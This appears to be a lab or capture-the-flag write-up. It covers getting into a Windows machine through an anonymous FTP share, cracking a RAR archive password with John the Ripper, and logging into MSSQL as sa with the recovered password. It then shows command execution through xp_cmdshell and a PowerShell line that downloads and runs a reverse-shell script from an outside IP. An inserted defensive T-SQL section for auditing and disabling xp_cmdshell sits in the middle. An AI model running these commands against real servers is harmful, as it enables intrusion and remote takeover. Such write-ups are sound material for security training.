FTP
The FTP server allowed anonymous access.
These are the files that were in the share.
Everything except MSSQL_BAK.rar is garbage.
In order to extract files from the .rar file this is the command I used:
unrar e MSSQL_BAK.rar /path/to/extract/
The rar file was unfortunately password protected, but this is nothing we can't handle because we have JohnTheRipper.
rar2john pulls a crackable hash out of the archive header, and john can then run a wordlist against that hash to recover the password.
Let me retrace some steps.
rar2john MSSQL_BAK.rar > rar2john.txt
john rar2john.txt --wordlist=/usr/share/wordlists/rockyou.txt
The password is letmeinplease.
After extracting we see that there is a password for the user sa. The password is EjectFrailtyThorn425.
Using sqsh and following my friend's guide on how to get RCE with sqsh.
The syntax is as follows:
sqsh -S victim-ip -U sa -P password
EXEC sp_configure 'show advanced options', 1
go
reconfigure
go
EXEC sp_configure 'xp_cmdshell', 1
go
reconfigure
go
xp_cmdshell whoami
go
output:
weoweo\wewo
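Since the whole foothold here rests on xp_cmdshell being switchable by sa, here is the defender-side view of the same configuration. This is an added example, not part of the original writeup: a T-SQL check you can run on a SQL Server you own to see whether xp_cmdshell is on, who has been explicitly granted it, whether the sa login is still enabled, and then to switch the feature back off. It uses only the built-in sp_configure, sys.configurations, sys.database_permissions and sys.sql_logins views, and assumes you are connected to the instance with sysadmin rights.

```sql
-- Added example (not from the original writeup): audit and disable xp_cmdshell.
-- Run as a sysadmin against the instance you are checking.

-- 1. Current state: value_in_use = 1 means xp_cmdshell is live right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Explicit EXECUTE grants on xp_cmdshell (sysadmin members are implicit and
--    do not show up here; an unexpected login in this list is a finding).
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM master.sys.database_permissions AS pe
JOIN master.sys.database_principals AS pr
  ON pe.grantee_principal_id = pr.principal_id
WHERE pe.major_id = OBJECT_ID('master..xp_cmdshell');

-- 3. Is the built-in sa login still enabled? The writeup got in through it.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE name = 'sa';

-- 4. Turn xp_cmdshell off and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Confirm: expect value_in_use = 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Step 4 is a hardening step, not a detection: anyone with sysadmin (including sa) can flip it back on with the same sp_configure calls the writeup uses, so the real fix is disabling or renaming sa, taking ordinary logins out of sysadmin, and alerting on the sp_configure 'xp_cmdshell' change in the SQL Server error log or audit.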
We can get a reverse shell if we do something like this:
xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://192.168.119.177/Invoke-PowerShellTcp.ps1')"
go
or
xp_cmdshell 'certutil blah blah blah'
go
then
xp_cmdshell 'cmd /c msf.exe'
go